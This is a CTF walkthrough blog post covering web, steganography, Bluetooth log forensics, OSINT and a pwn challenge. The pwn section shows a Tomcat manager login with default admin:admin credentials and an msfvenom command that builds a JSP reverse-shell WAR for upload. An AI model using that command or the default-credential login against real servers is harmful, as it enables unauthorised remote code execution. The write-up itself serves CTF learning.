Skip to main content

Sector443 CTF Walkthrough


This is where it all started I was watching an episode of The Boys when a friend of mine gave me a link to this CTF and asked me to play if I had the time, and I has plenty XD
Most of the challenges where based on reverse engineering binaries.

Web

The challenge had an HTML file when opened with a browser it gives a prompt to enter a password the end goal is to find the password which is the flag

Here is the code, By the looks of it I can see a load of variable declaration and looping by the hex thing looks promising by printing it on console it spits out some char codes

console.log("\x31\x30\x32\x2c\x31\x30\x38\x2c\x39\x37\x2c\x31\x30\x33\x2c\x31\x32\x33\x2c\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30\x2c\x31\x32\x35");

Now we have a set of char codes which can then be converted using the String.fromCharCode function
print(String.fromCharCode(102, 108, 97,103,123,55,56,54,79,115,69,114,116,107,49,50,125));

Which returns the flag "flag{786OsErtk12}"

Steg

 The challenge gives us a GIF of Captain America flying 

 (original image from challenge)

By running binwalk over it to check for hidden files we can see that there is a RAR file embedded in the GIF

After extracting the RAR file we have another image and a text file



Chasing and avenging the hydra's head Arnim Zola, captain america finally got control over the ship and crashed into the Arctic going into a unconsciousness sleep of "steghide". Releasing Next: Captain America "wintersoldier"

So we have steghide and wintersoldier which means only one thing.

and we have the flag flag{YzRwdDQxbl80bTNyMWM0} 

Forensics

In this challenge we are given a btsnoop log file form which we have to find the unlock sequence and get the value which is the flag, We can view the log file on wireshark

 
Now we have to find the Unlock Request , As the challenge description says the the unlock request is send through an app so the Source would be a Smart Phone and the destination is the Smart Lock 

By Filtering the source and searching for a Value attribute I was able to figure out the Unlock request.
As the image shows a Send Write Request is generated from a Redmi4 to the Smart Lock with the handle of 0x0003 and as per the challenge description there should be 5 requests by counting them I knew this was it.

Osint 
In this challenge the goal is to find a person whose name is "Peter Grulich" who likes ponies and we need to find the flag.I started my search in google by entering the following


The first thing is a GitHub profile by investigating I noticed that the account is created at the time of the CTF and there is only one repository by looking at the commit history there is a peculiar commit
 
By checking the Remove secret commit we have a flag


Pwn


In this challenge we have to download a VM and import it to virtual box in order to solve the challenge,Before that a Host only connection has to be made in order to access the box (which I didn't like) ,After importing the machine and staring it we have a static IP address.
By doing an NMAP on the IP address we can see that a port 8080 is open which is running Apache Tomcat


By checking the manager page we have a login prompt by trying admin:admin we are able to login to the app 
Now we can upload a shell and gain code execution I used metasploit to generate the payload 
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.x.x LPORT=xxxx -f war > shell.war

Now all we have to do is start an exploit handler on metasploit and upload the war file and execute it.